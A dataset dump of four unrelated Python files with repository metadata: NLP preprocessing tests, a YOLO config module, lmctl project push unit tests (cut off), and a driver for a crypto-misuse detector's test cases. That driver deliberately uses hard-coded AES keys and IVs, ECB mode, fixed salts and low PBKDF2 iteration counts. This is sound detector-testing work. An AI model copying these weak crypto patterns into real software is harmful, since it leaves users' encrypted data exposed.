0fed8120571e44e12ee3d1861289bc101c0a275f
|
[
"MIT"
] | null | null | null |
opennre/tests/preprocess/test_preprocess.py
|
igorvlnascimento/DeepREF
|
0fed8120571e44e12ee3d1861289bc101c0a275f
|
[
"MIT"
] | null | null | null |
import os
from opennre.dataset.preprocess_dataset import PreprocessDataset
def test_should_return_sw_eb_preprocessed_file_ddi():
p = PreprocessDataset("ddi", ["sw", "eb"])
p.preprocess_dataset()
assert os.path.exists("benchmark/ddi/eb_sw/ddi_test_eb_sw.txt")
assert os.path.exists("benchmark/ddi/eb_sw/ddi_test_eb_sw.txt")
assert os.path.exists("benchmark/ddi/eb_sw/ddi_test_eb_sw.txt")
def test_should_return_b_d_preprocessed_file_ddi():
p = PreprocessDataset("ddi", ["b", "d"])
p.preprocess_dataset()
assert os.path.exists("benchmark/ddi/b_d/ddi_test_b_d.txt")
assert os.path.exists("benchmark/ddi/b_d/ddi_test_b_d.txt")
assert os.path.exists("benchmark/ddi/b_d/ddi_test_b_d.txt")
def test_should_return_sw_eb_preprocessed_file_semeval2010():
p = PreprocessDataset("semeval2010", ["sw", "eb"])
p.preprocess_dataset()
assert os.path.exists("benchmark/semeval2010/eb_sw/semeval2010_test_eb_sw.txt")
assert os.path.exists("benchmark/semeval2010/eb_sw/semeval2010_test_eb_sw.txt")
assert os.path.exists("benchmark/semeval2010/eb_sw/semeval2010_test_eb_sw.txt")
def test_should_return_b_d_preprocessed_file_semeval20181():
p = PreprocessDataset("semeval20181-1", ["b", "d"])
p.preprocess_dataset()
assert os.path.exists("benchmark/semeval20181-1/b_d/semeval20181-1_test_b_d.txt")
assert os.path.exists("benchmark/semeval20181-1/b_d/semeval20181-1_test_b_d.txt")
assert os.path.exists("benchmark/semeval20181-1/b_d/semeval20181-1_test_b_d.txt")
def test_should_return_b_d_preprocessed_file_semeval20182():
p = PreprocessDataset("semeval20181-2", ["b", "d"])
p.preprocess_dataset()
assert os.path.exists("benchmark/semeval20181-2/b_d/semeval20181-2_test_b_d.txt")
assert os.path.exists("benchmark/semeval20181-2/b_d/semeval20181-2_test_b_d.txt")
assert os.path.exists("benchmark/semeval20181-2/b_d/semeval20181-2_test_b_d.txt")
| 49.974359
| 85
| 0.762442
| 303
| 1,949
| 4.570957
| 0.09571
| 0.034657
| 0.129964
| 0.194946
| 0.861372
| 0.861372
| 0.826715
| 0.826715
| 0.770397
| 0.743682
| 0
| 0.072124
| 0.103643
| 1,949
| 39
| 86
| 49.974359
| 0.720664
| 0
| 0
| 0.625
| 0
| 0
| 0.39641
| 0.366154
| 0
| 0
| 0
| 0
| 0.46875
| 1
| 0.15625
| false
| 0
| 0.0625
| 0
| 0.21875
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
a99c6be9eb60780712e75faebfbd77806fa2ff5c
| 20,191
|
py
|
Python
|
resources/test_cases/python/PyCrypto/python-code-testc.py
|
stg-tud/licma
|
b899e6e682f7716d19e79d6ce7b73c28c6efd4cf
|
[
"MIT"
] | 5
|
2021-09-13T11:24:13.000Z
|
2022-03-18T21:56:58.000Z
|
resources/test_cases/python/PyCrypto/python-code-testc.py
|
stg-tud/licma
|
b899e6e682f7716d19e79d6ce7b73c28c6efd4cf
|
[
"MIT"
] | null | null | null |
resources/test_cases/python/PyCrypto/python-code-testc.py
|
stg-tud/licma
|
b899e6e682f7716d19e79d6ce7b73c28c6efd4cf
|
[
"MIT"
] | 1
|
2021-09-13T06:02:20.000Z
|
2021-09-13T06:02:20.000Z
|
from Crypto.Cipher import AES
from Crypto.Protocol.KDF import PBKDF2
from TestRule1c import TestRule1c
from TestRule2c import TestRule2c
from TestRule3c import TestRule3c
from TestRule4c import TestRule4c
from TestRule5c import TestRule5c
g_key = b"1234567812345678"
g_iv = b"1234567812345678"
g_password = "12345678"
g_salt = b"12345678"
g_count_lower_1000 = 999
g_count_equal_1000 = 1000
g_plaintext = b"abcdefghijklmnop"
g_mode = AES.MODE_ECB
def decrypt_aes_ecb(key, data):
cipher = AES.new(key, AES.MODE_ECB)
cipher_text = cipher.decrypt(data)
return cipher_text
def decrypt_aes_cbc(key, iv, data):
cipher = AES.new(key, AES.MODE_CBC, iv)
cipher_text = cipher.decrypt(data)
return cipher_text
def get_pbk(salt, count):
return PBKDF2(g_password, salt, 16, count=count)
if __name__ == '__main__':
# TestRule1c code
testRule1c = TestRule1c()
print("PyCrypto -> rule1 -> p_example1_hard_coded1:",
decrypt_aes_ecb(g_key, testRule1c.p_example1_hard_coded1(g_key, g_plaintext)) == g_plaintext)
print("PyCrypto -> rule1 -> p_example2_hard_coded2:",
decrypt_aes_ecb(g_key, testRule1c.p_example2_hard_coded2(g_key, g_plaintext)) == g_plaintext)
print("PyCrypto -> rule1 -> p_example3_local_variable1:",
decrypt_aes_ecb(g_key, testRule1c.p_example3_local_variable1(g_key, g_plaintext)) == g_plaintext)
print("PyCrypto -> rule1 -> p_example4_local_variable2:",
decrypt_aes_ecb(g_key, testRule1c.p_example4_local_variable2(g_key, g_plaintext)) == g_plaintext)
print("PyCrypto -> rule1 -> p_example5_nested_local_variable1:",
decrypt_aes_ecb(g_key, testRule1c.p_example5_nested_local_variable1(g_key, g_plaintext)) == g_plaintext)
print("PyCrypto -> rule1 -> p_example6_nested_local_variable2:",
decrypt_aes_ecb(g_key, testRule1c.p_example6_nested_local_variable2(g_key, g_plaintext)) == g_plaintext)
print("PyCrypto -> rule1 -> p_example7_direct_method_call1:",
decrypt_aes_ecb(g_key, testRule1c.p_example7_direct_method_call1(g_key, g_plaintext)) == g_plaintext)
print("PyCrypto -> rule1 -> p_example8_direct_method_call2:",
decrypt_aes_ecb(g_key, testRule1c.p_example8_direct_method_call2(g_key, g_plaintext)) == g_plaintext)
print("PyCrypto -> rule1 -> p_example9_nested_method_call1:",
decrypt_aes_ecb(g_key, testRule1c.p_example9_nested_method_call1(g_key, g_plaintext)) == g_plaintext)
print("PyCrypto -> rule1 -> p_example10_nested_method_call2:",
decrypt_aes_ecb(g_key, testRule1c.p_example10_nested_method_call2(g_key, g_plaintext)) == g_plaintext)
print("PyCrypto -> rule1 -> p_example11_direct_g_variable_access1:",
decrypt_aes_ecb(g_key, testRule1c.p_example11_direct_g_variable_access1(g_key, g_plaintext)) == g_plaintext)
print("PyCrypto -> rule1 -> p_example12_direct_g_variable_access2:",
decrypt_aes_ecb(g_key, testRule1c.p_example12_direct_g_variable_access2(g_key, g_plaintext)) == g_plaintext)
print("PyCrypto -> rule1 -> p_example13_indirect_g_variable_access1:",
decrypt_aes_ecb(g_key, testRule1c.p_example13_indirect_g_variable_access1(g_key, g_plaintext)) == g_plaintext)
print("PyCrypto -> rule1 -> p_example14_indirect_g_variable_access2:",
decrypt_aes_ecb(g_key, testRule1c.p_example14_indirect_g_variable_access2(g_key, g_plaintext)) == g_plaintext)
print("PyCrypto -> rule1 -> p_example15_warning_parameter_not_resolvable:", decrypt_aes_ecb(g_key,
testRule1c.p_example15_warning_parameter_not_resolvable(
g_key, g_plaintext,
g_mode)) == g_plaintext)
print("PyCrypto -> rule1 -> n_example1_cbc:", testRule1c.n_example1_cbc(g_key, g_iv, g_plaintext))
# TestRule2c code
testRule2c = TestRule2c()
print("PyCrypto -> rule2 -> p_example1_hard_coded1:",
decrypt_aes_cbc(g_key, g_iv, testRule2c.p_example1_hard_coded1(g_key, g_plaintext)) == g_plaintext)
print("PyCrypto -> rule2 -> p_example2_hard_coded2:",
decrypt_aes_cbc(g_key, g_iv, testRule2c.p_example2_hard_coded2(g_key, g_plaintext)) == g_plaintext)
print("PyCrypto -> rule2 -> p_example3_local_variable1:",
decrypt_aes_cbc(g_key, g_iv, testRule2c.p_example3_local_variable1(g_key, g_plaintext)) == g_plaintext)
print("PyCrypto -> rule2 -> p_example4_local_variable2:",
decrypt_aes_cbc(g_key, g_iv, testRule2c.p_example4_local_variable2(g_key, g_plaintext)) == g_plaintext)
print("PyCrypto -> rule2 -> p_example5_nested_local_variable1:",
decrypt_aes_cbc(g_key, g_iv, testRule2c.p_example5_nested_local_variable1(g_key, g_plaintext)) == g_plaintext)
print("PyCrypto -> rule2 -> p_example6_nested_local_variable2:",
decrypt_aes_cbc(g_key, g_iv, testRule2c.p_example6_nested_local_variable2(g_key, g_plaintext)) == g_plaintext)
print("PyCrypto -> rule2 -> p_example7_direct_method_call1:",
decrypt_aes_cbc(g_key, g_iv, testRule2c.p_example7_direct_method_call1(g_key, g_plaintext)) == g_plaintext)
print("PyCrypto -> rule2 -> p_example8_direct_method_call2:",
decrypt_aes_cbc(g_key, g_iv, testRule2c.p_example8_direct_method_call2(g_key, g_plaintext)) == g_plaintext)
print("PyCrypto -> rule2 -> p_example9_nested_method_call1:",
decrypt_aes_cbc(g_key, g_iv, testRule2c.p_example9_nested_method_call1(g_key, g_plaintext)) == g_plaintext)
print("PyCrypto -> rule2 -> p_example10_nested_method_call2:",
decrypt_aes_cbc(g_key, g_iv, testRule2c.p_example10_nested_method_call2(g_key, g_plaintext)) == g_plaintext)
print("PyCrypto -> rule2 -> p_example11_direct_g_variable_access1:", decrypt_aes_cbc(g_key, g_iv,
testRule2c.p_example11_direct_g_variable_access1(
g_key,
g_plaintext)) == g_plaintext)
print("PyCrypto -> rule2 -> p_example12_direct_g_variable_access2:", decrypt_aes_cbc(g_key, g_iv,
testRule2c.p_example12_direct_g_variable_access2(
g_key,
g_plaintext)) == g_plaintext)
print("PyCrypto -> rule2 -> p_example13_indirect_g_variable_access1:", decrypt_aes_cbc(g_key, g_iv,
testRule2c.p_example13_indirect_g_variable_access1(
g_key,
g_plaintext)) == g_plaintext)
print("PyCrypto -> rule2 -> p_example14_indirect_g_variable_access2:", decrypt_aes_cbc(g_key, g_iv,
testRule2c.p_example14_indirect_g_variable_access2(
g_key,
g_plaintext)) == g_plaintext)
print("PyCrypto -> rule2 -> p_example15_warning_parameter_not_resolvable:", decrypt_aes_cbc(g_key, g_iv,
testRule2c.p_example15_warning_parameter_not_resolvable(
g_key, g_iv,
g_plaintext)) == g_plaintext)
print("PyCrypto -> rule2 -> n_example1_secrets_system_random:",
testRule2c.n_example1_secrets_system_random(g_key, g_plaintext))
# TestRule3c code
testRule3c = TestRule3c()
print("PyCrypto -> rule3 -> p_example1_hard_coded1:",
decrypt_aes_ecb(g_key, testRule3c.p_example1_hard_coded1(g_plaintext)) == g_plaintext)
print("PyCrypto -> rule3 -> p_example2_hard_coded2:",
decrypt_aes_ecb(g_key, testRule3c.p_example2_hard_coded2(g_plaintext)) == g_plaintext)
print("PyCrypto -> rule3 -> p_example3_local_variable1:",
decrypt_aes_ecb(g_key, testRule3c.p_example3_local_variable1(g_plaintext)) == g_plaintext)
print("PyCrypto -> rule3 -> p_example4_local_variable2:",
decrypt_aes_ecb(g_key, testRule3c.p_example4_local_variable2(g_plaintext)) == g_plaintext)
print("PyCrypto -> rule3 -> p_example5_nested_local_variable1:",
decrypt_aes_ecb(g_key, testRule3c.p_example5_nested_local_variable1(g_plaintext)) == g_plaintext)
print("PyCrypto -> rule3 -> p_example6_nested_local_variable2:",
decrypt_aes_ecb(g_key, testRule3c.p_example6_nested_local_variable2(g_plaintext)) == g_plaintext)
print("PyCrypto -> rule3 -> p_example7_direct_method_call1:",
decrypt_aes_ecb(g_key, testRule3c.p_example7_direct_method_call1(g_plaintext)) == g_plaintext)
print("PyCrypto -> rule3 -> p_example8_direct_method_call2:",
decrypt_aes_ecb(g_key, testRule3c.p_example8_direct_method_call2(g_plaintext)) == g_plaintext)
print("PyCrypto -> rule3 -> p_example9_nested_method_call1:",
decrypt_aes_ecb(g_key, testRule3c.p_example9_nested_method_call1(g_plaintext)) == g_plaintext)
print("PyCrypto -> rule3 -> p_example10_nested_method_call2:",
decrypt_aes_ecb(g_key, testRule3c.p_example10_nested_method_call2(g_plaintext)) == g_plaintext)
print("PyCrypto -> rule3 -> p_example11_direct_g_variable_access1:",
decrypt_aes_ecb(g_key, testRule3c.p_example11_direct_g_variable_access1(g_plaintext)) == g_plaintext)
print("PyCrypto -> rule3 -> p_example12_direct_g_variable_access2:",
decrypt_aes_ecb(g_key, testRule3c.p_example12_direct_g_variable_access2(g_plaintext)) == g_plaintext)
print("PyCrypto -> rule3 -> p_example13_indirect_g_variable_access1:",
decrypt_aes_ecb(g_key, testRule3c.p_example13_indirect_g_variable_access1(g_plaintext)) == g_plaintext)
print("PyCrypto -> rule3 -> p_example14_indirect_g_variable_access2:",
decrypt_aes_ecb(g_key, testRule3c.p_example14_indirect_g_variable_access2(g_plaintext)) == g_plaintext)
print("PyCrypto -> rule3 -> p_example15_warning_parameter_not_resolvable:", decrypt_aes_ecb(g_key,
testRule3c.p_example15_warning_parameter_not_resolvable(
g_key,
g_plaintext)) == g_plaintext)
print("PyCrypto -> rule3 -> n_example1_random_key:", testRule3c.n_example1_random_key(g_plaintext))
# TestRule4c code
testRule4c = TestRule4c()
print("PyCrypto -> rule4 -> p_example1_hard_coded1:", decrypt_aes_ecb(get_pbk(g_salt, g_count_equal_1000),
testRule4c.p_example1_hard_coded1(g_password,
g_plaintext)) == g_plaintext)
print("PyCrypto -> rule4 -> p_example2_hard_coded2:", decrypt_aes_ecb(get_pbk(g_salt, g_count_equal_1000),
testRule4c.p_example2_hard_coded2(g_password,
g_plaintext)) == g_plaintext)
print("PyCrypto -> rule4 -> p_example3_local_variable1:", decrypt_aes_ecb(get_pbk(g_salt, g_count_equal_1000),
testRule4c.p_example3_local_variable1(
g_password,
g_plaintext)) == g_plaintext)
print("PyCrypto -> rule4 -> p_example4_local_variable2:", decrypt_aes_ecb(get_pbk(g_salt, g_count_equal_1000),
testRule4c.p_example4_local_variable2(
g_password,
g_plaintext)) == g_plaintext)
print("PyCrypto -> rule4 -> p_example5_nested_local_variable1:",
decrypt_aes_ecb(get_pbk(g_salt, g_count_equal_1000),
testRule4c.p_example5_nested_local_variable1(g_password, g_plaintext)) == g_plaintext)
print("PyCrypto -> rule4 -> p_example6_nested_local_variable2:",
decrypt_aes_ecb(get_pbk(g_salt, g_count_equal_1000),
testRule4c.p_example6_nested_local_variable2(g_password, g_plaintext)) == g_plaintext)
print("PyCrypto -> rule4 -> p_example7_direct_method_call1:", decrypt_aes_ecb(get_pbk(g_salt, g_count_equal_1000),
testRule4c.p_example7_direct_method_call1(
g_password,
g_plaintext)) == g_plaintext)
print("PyCrypto -> rule4 -> p_example8_direct_method_call2:", decrypt_aes_ecb(get_pbk(g_salt, g_count_equal_1000),
testRule4c.p_example8_direct_method_call2(
g_password,
g_plaintext)) == g_plaintext)
print("PyCrypto -> rule4 -> p_example9_nested_method_call1:", decrypt_aes_ecb(get_pbk(g_salt, g_count_equal_1000),
testRule4c.p_example9_nested_method_call1(
g_password,
g_plaintext)) == g_plaintext)
print("PyCrypto -> rule4 -> p_example10_nested_method_call2:", decrypt_aes_ecb(get_pbk(g_salt, g_count_equal_1000),
testRule4c.p_example10_nested_method_call2(
g_password,
g_plaintext)) == g_plaintext)
print("PyCrypto -> rule4 -> p_example11_direct_g_variable_access1:",
decrypt_aes_ecb(get_pbk(g_salt, g_count_equal_1000),
testRule4c.p_example11_direct_g_variable_access1(g_password, g_plaintext)) == g_plaintext)
print("PyCrypto -> rule4 -> p_example12_direct_g_variable_access2:",
decrypt_aes_ecb(get_pbk(g_salt, g_count_equal_1000),
testRule4c.p_example12_direct_g_variable_access2(g_password, g_plaintext)) == g_plaintext)
print("PyCrypto -> rule4 -> p_example13_indirect_g_variable_access1:",
decrypt_aes_ecb(get_pbk(g_salt, g_count_equal_1000),
testRule4c.p_example13_indirect_g_variable_access1(g_password, g_plaintext)) == g_plaintext)
print("PyCrypto -> rule4 -> p_example14_indirect_g_variable_access2:",
decrypt_aes_ecb(get_pbk(g_salt, g_count_equal_1000),
testRule4c.p_example14_indirect_g_variable_access2(g_password, g_plaintext)) == g_plaintext)
print("PyCrypto -> rule4 -> p_example15_warning_parameter_not_resolvable:",
decrypt_aes_ecb(get_pbk(g_salt, g_count_equal_1000),
testRule4c.p_example15_warning_parameter_not_resolvable(g_password, g_salt,
g_plaintext)) == g_plaintext)
print("PyCrypto -> rule4 -> n_example1_random_salt:", testRule4c.n_example1_random_salt(g_password, g_plaintext))
# TestRule5c code
testRule5c = TestRule5c()
print("PyCrypto -> rule5 -> p_example1_hard_coded1:", decrypt_aes_ecb(get_pbk(g_salt, g_count_lower_1000),
testRule5c.p_example1_hard_coded(g_password,
g_plaintext)) == g_plaintext)
print("PyCrypto -> rule5 -> p_example2_local_variable:", decrypt_aes_ecb(get_pbk(g_salt, g_count_lower_1000),
testRule5c.p_example2_local_variable(
g_password,
g_plaintext)) == g_plaintext)
print("PyCrypto -> rule5 -> p_example3_nested_local_variable:", decrypt_aes_ecb(get_pbk(g_salt, g_count_lower_1000),
testRule5c.p_example3_nested_local_variable(
g_password,
g_plaintext)) == g_plaintext)
print("PyCrypto -> rule5 -> p_example4_direct_method_call:", decrypt_aes_ecb(get_pbk(g_salt, g_count_lower_1000),
testRule5c.p_example4_direct_method_call(
g_password,
g_plaintext)) == g_plaintext)
print("PyCrypto -> rule5 -> p_example5_nested_method_call:", decrypt_aes_ecb(get_pbk(g_salt, g_count_lower_1000),
testRule5c.p_example5_nested_method_call(
g_password,
g_plaintext)) == g_plaintext)
print("PyCrypto -> rule5 -> p_example6_direct_g_variable_access:",
decrypt_aes_ecb(get_pbk(g_salt, g_count_lower_1000),
testRule5c.p_example6_direct_g_variable_access(g_password, g_plaintext)) == g_plaintext)
print("PyCrypto -> rule5 -> p_example7_indirect_g_variable_access:",
decrypt_aes_ecb(get_pbk(g_salt, g_count_lower_1000),
testRule5c.p_example7_indirect_g_variable_access(g_password, g_plaintext)) == g_plaintext)
print("PyCrypto -> rule5 -> p_example8_warning_parameter_not_resolvable:",
decrypt_aes_ecb(get_pbk(g_salt, g_count_lower_1000),
testRule5c.p_example8_warning_parameter_not_resolvable(g_password, g_count_lower_1000,
g_plaintext)) == g_plaintext)
print("PyCrypto -> rule5 -> n_example1_random_salt:",
testRule5c.n_example1_iterations_eq_1000(g_password, g_plaintext))
| 83.433884
| 152
| 0.566738
| 2,086
| 20,191
| 4.941515
| 0.045542
| 0.137757
| 0.072565
| 0.151727
| 0.899884
| 0.873205
| 0.842355
| 0.78735
| 0.759701
| 0.685293
| 0
| 0.049745
| 0.357833
| 20,191
| 241
| 153
| 83.780083
| 0.745257
| 0.003913
| 0
| 0.224215
| 0
| 0
| 0.196807
| 0.116234
| 0
| 0
| 0
| 0
| 0
| 1
| 0.013453
| false
| 0.121076
| 0.03139
| 0.004484
| 0.058296
| 0.327354
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 7
|
8d1d38a9a445c761ec65d60d9fd0e5efcf40f635
| 7,094
|
py
|
Python
|
xl_tensorflow/models/vision/detection/configs/yolo_config.py
|
Lannister-Xiaolin/xl_tensorflow
|
99e0f458769ee1e45ebf55c789961e40f7d2eeac
|
[
"Apache-2.0"
] | null | null | null |
xl_tensorflow/models/vision/detection/configs/yolo_config.py
|
Lannister-Xiaolin/xl_tensorflow
|
99e0f458769ee1e45ebf55c789961e40f7d2eeac
|
[
"Apache-2.0"
] | 1
|
2020-11-13T18:52:23.000Z
|
2020-11-13T18:52:23.000Z
|
xl_tensorflow/models/vision/detection/configs/yolo_config.py
|
Lannister-Xiaolin/xl_tensorflow
|
99e0f458769ee1e45ebf55c789961e40f7d2eeac
|
[
"Apache-2.0"
] | null | null | null |
from .common import Config
from xl_tensorflow.models.vision.classification.darknet import DarknetConv2D_BN_Leaky, DarknetConv2D
from tensorflow.keras import layers
def default_yolo_config():
"""default yolo config """
config = Config()
config.name = "yolov3"
config.image_size = 608
config.anchors_per_grid = 3
config.num_classes = 80
# ssp module
config.spp = False
# feature aggregation config
config.agg_method = "fpn"
config.agg_inputs_ops = []
config.backward_ops = []
config.forward_ops = []
config.inlevel_backward_ops = []
config.inlevel_forward_ops = []
config.agg_out_ops = []
return config
def get_model_param(model_name='yolov4', num_anchors=3, num_classes=80,base_ops=DarknetConv2D_BN_Leaky):
yolo_out_size = (num_classes + 5) * num_anchors
yolo_model_param_dict = {
"yolov4":
dict(
name="yolov4",
agg_method="panet",
spp=True,
# all config order as from p1——>p7 direction
agg_inputs_ops=[
[base_ops(filters=128, kernel_size=1, strides=1)],
[base_ops(filters=256, kernel_size=1, strides=1)],
[base_ops(filters=512, kernel_size=1, strides=1)]
],
# all config order as from p7——>p1 direction
backward_ops=[
[base_ops(filters=256, kernel_size=1, strides=1),
layers.UpSampling2D()],
[base_ops(filters=128, kernel_size=1, strides=1),
layers.UpSampling2D()]
],
# all config order as from p1——>p7 direction
forward_ops=[
[layers.ZeroPadding2D(((1, 0), (1, 0))), base_ops(filters=256, kernel_size=3, strides=2), ],
[layers.ZeroPadding2D(((1, 0), (1, 0))), base_ops(filters=512, kernel_size=3, strides=2), ]
],
# all config order as from p7——>p1 direction
inlevel_backward_ops=[
[],
[
base_ops(filters=256, kernel_size=1, strides=1),
base_ops(filters=512, kernel_size=3, strides=1),
base_ops(filters=256, kernel_size=1, strides=1),
base_ops(filters=512, kernel_size=3, strides=1),
base_ops(filters=256, kernel_size=1, strides=1),
],
[
base_ops(filters=128, kernel_size=1, strides=1),
base_ops(filters=256, kernel_size=3, strides=1),
base_ops(filters=128, kernel_size=1, strides=1),
base_ops(filters=256, kernel_size=3, strides=1),
base_ops(filters=128, kernel_size=1, strides=1),
],
],
# all config order as from p1——>p7 direction
inlevel_forward_ops=[
[],
[
base_ops(filters=256, kernel_size=1, strides=1),
base_ops(filters=512, kernel_size=3, strides=1),
base_ops(filters=256, kernel_size=1, strides=1),
base_ops(filters=512, kernel_size=3, strides=1),
base_ops(filters=256, kernel_size=1, strides=1),
],
[
base_ops(filters=512, kernel_size=1, strides=1),
base_ops(filters=1024, kernel_size=3, strides=1),
base_ops(filters=512, kernel_size=1, strides=1),
base_ops(filters=1024, kernel_size=3, strides=1),
base_ops(filters=512, kernel_size=1, strides=1),
],
],
# all config order as from p1——>p7 direction
agg_out_ops=[
[base_ops(filters=256, kernel_size=3, strides=1),
DarknetConv2D(filters=yolo_out_size, kernel_size=1, strides=1)],
[base_ops(filters=512, kernel_size=3, strides=1),
DarknetConv2D(filters=yolo_out_size, kernel_size=1, strides=1)],
[base_ops(filters=1024, kernel_size=3, strides=1),
DarknetConv2D(filters=yolo_out_size, kernel_size=1, strides=1)]
]
),
"yolov3": dict(
name="yolov3",
agg_method="fpn",
spp=False,
agg_inputs_ops=[
[],
[],
[]
],
backward_ops=[
[base_ops(filters=256, kernel_size=1, strides=1),
layers.UpSampling2D()],
[base_ops(filters=128, kernel_size=1, strides=1),
layers.UpSampling2D()]
],
inlevel_backward_ops=[
[base_ops(filters=512, kernel_size=1, strides=1),
base_ops(filters=1024, kernel_size=3, strides=1),
base_ops(filters=512, kernel_size=1, strides=1),
base_ops(filters=1024, kernel_size=3, strides=1),
base_ops(filters=512, kernel_size=1, strides=1), ],
[
base_ops(filters=256, kernel_size=1, strides=1),
base_ops(filters=512, kernel_size=3, strides=1),
base_ops(filters=256, kernel_size=1, strides=1),
base_ops(filters=512, kernel_size=3, strides=1),
base_ops(filters=256, kernel_size=1, strides=1),
],
[
base_ops(filters=128, kernel_size=1, strides=1),
base_ops(filters=256, kernel_size=3, strides=1),
base_ops(filters=128, kernel_size=1, strides=1),
base_ops(filters=256, kernel_size=3, strides=1),
base_ops(filters=128, kernel_size=1, strides=1),
],
],
# all config order as from p1——>p7 direction
agg_out_ops=[
[base_ops(filters=256, kernel_size=3, strides=1),
DarknetConv2D(filters=yolo_out_size, kernel_size=1, strides=1)],
[base_ops(filters=512, kernel_size=3, strides=1),
DarknetConv2D(filters=yolo_out_size, kernel_size=1, strides=1)],
[base_ops(filters=1024, kernel_size=3, strides=1),
DarknetConv2D(filters=yolo_out_size, kernel_size=1, strides=1)]
]
),
}
return yolo_model_param_dict[model_name]
def get_yolo_config(model_name='yolov4', num_anchors=3, num_classes=80,base_ops=DarknetConv2D_BN_Leaky):
"""Get the default config for yolo based on model name."""
h = default_yolo_config()
h.override(get_model_param(model_name=model_name,
num_anchors=num_anchors, num_classes=num_classes,base_ops=base_ops))
return h
| 45.474359
| 112
| 0.524105
| 812
| 7,094
| 4.35468
| 0.098522
| 0.158371
| 0.197964
| 0.161199
| 0.7681
| 0.757636
| 0.750566
| 0.750566
| 0.738688
| 0.693722
| 0
| 0.072703
| 0.367917
| 7,094
| 155
| 113
| 45.767742
| 0.712756
| 0.058641
| 0
| 0.595588
| 0
| 0
| 0.007959
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.022059
| false
| 0
| 0.022059
| 0
| 0.066176
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
8d4501929f311e2ea9716d10c251dcb555cd9f90
| 8,121
|
py
|
Python
|
tests/unit/project_lifecycle/project/typetests/test_push.py
|
manojn97/lmctl
|
844925cb414722351efac90cb97f10c1185eef7a
|
[
"Apache-2.0"
] | 3
|
2021-07-19T09:46:01.000Z
|
2022-03-07T13:51:25.000Z
|
tests/unit/project_lifecycle/project/typetests/test_push.py
|
manojn97/lmctl
|
844925cb414722351efac90cb97f10c1185eef7a
|
[
"Apache-2.0"
] | 43
|
2019-08-27T12:36:29.000Z
|
2020-08-27T14:50:40.000Z
|
tests/unit/project_lifecycle/project/typetests/test_push.py
|
manojn97/lmctl
|
844925cb414722351efac90cb97f10c1185eef7a
|
[
"Apache-2.0"
] | 7
|
2020-09-22T20:32:17.000Z
|
2022-03-29T12:25:51.000Z
|
import unittest
from unittest.mock import call
import os
import tests.common.simulations.project_lab as project_lab
from tests.common.project_testing import (ProjectSimTestCase, PROJECT_CONTAINS_DIR)
from lmctl.project.sessions import EnvironmentSessions
from lmctl.project.package.core import Pkg, PkgContent, PushOptions
class TestPushTestPkgs(ProjectSimTestCase):
def test_push_creates_descriptor(self):
pkg_sim = self.simlab.simulate_pkg_type_basic()
pkg = Pkg(pkg_sim.path)
push_options = PushOptions()
lm_sim = self.simlab.simulate_lm()
lm_session = lm_sim.as_mocked_session()
env_sessions = EnvironmentSessions(lm_session)
result = pkg.push(env_sessions, push_options)
self.assertIsInstance(result, PkgContent)
lm_session.descriptor_driver.get_descriptor.assert_called_once_with('type::basic::1.0')
lm_session.descriptor_driver.create_descriptor.assert_called_once_with('name: type::basic::1.0\ndescription: descriptor for basic\n')
def test_push_updates_descriptors_if_exists(self):
pkg_sim = self.simlab.simulate_pkg_type_basic()
pkg = Pkg(pkg_sim.path)
push_options = PushOptions()
lm_sim = self.simlab.simulate_lm()
lm_sim.add_descriptor('name: type::basic::1.0\ndescription: pre-update descriptor for basic\n')
lm_session = lm_sim.as_mocked_session()
env_sessions = EnvironmentSessions(lm_session)
result = pkg.push(env_sessions, push_options)
self.assertIsInstance(result, PkgContent)
lm_session.descriptor_driver.get_descriptor.assert_called_once_with('type::basic::1.0')
lm_session.descriptor_driver.create_descriptor.assert_not_called()
lm_session.descriptor_driver.update_descriptor.assert_called_once_with('type::basic::1.0', 'name: type::basic::1.0\ndescription: descriptor for basic\n')
def test_push_creates_behaviour_configuration(self):
pkg_sim = self.simlab.simulate_pkg_type_with_behaviour()
pkg = Pkg(pkg_sim.path)
push_options = PushOptions()
lm_sim = self.simlab.simulate_lm()
lm_session = lm_sim.as_mocked_session()
env_sessions = EnvironmentSessions(lm_session)
result = pkg.push(env_sessions, push_options)
self.assertIsInstance(result, PkgContent)
lm_session.behaviour_driver.create_assembly_configuration.assert_called_once_with({
"name": "simple",
"projectId": "type::with_behaviour::1.0",
"description": "a simple assembly config",
"properties": {
"a": "123"
},
"createdAt": "2019-01-01T01:00:00.613Z",
"lastModifiedAt": "2019-01-02T01:00:00.613Z",
"descriptorName": "type::with_behaviour::1.0"
})
def test_push_updates_behaviour_configuration_if_exists(self):
pkg_sim = self.simlab.simulate_pkg_type_with_behaviour()
pkg = Pkg(pkg_sim.path)
push_options = PushOptions()
lm_sim = self.simlab.simulate_lm()
lm_sim.add_project({'id': 'type::with_behaviour::1.0', 'name': 'type::with_behaviour::1.0'})
lm_sim.add_assembly_configuration({'id': 'existing', 'projectId': 'type::with_behaviour::1.0', 'name': 'simple'})
lm_session = lm_sim.as_mocked_session()
env_sessions = EnvironmentSessions(lm_session)
result = pkg.push(env_sessions, push_options)
self.assertIsInstance(result, PkgContent)
lm_session.behaviour_driver.create_assembly_configuration.assert_not_called()
lm_session.behaviour_driver.update_assembly_configuration.assert_called_once_with({
"id": "existing",
"name": "simple",
"projectId": "type::with_behaviour::1.0",
"description": "a simple assembly config",
"properties": {
"a": "123"
},
"createdAt": "2019-01-01T01:00:00.613Z",
"lastModifiedAt": "2019-01-02T01:00:00.613Z",
"descriptorName": "type::with_behaviour::1.0"
})
def test_push_creates_behaviour_scenarios(self):
pkg_sim = self.simlab.simulate_pkg_type_with_behaviour()
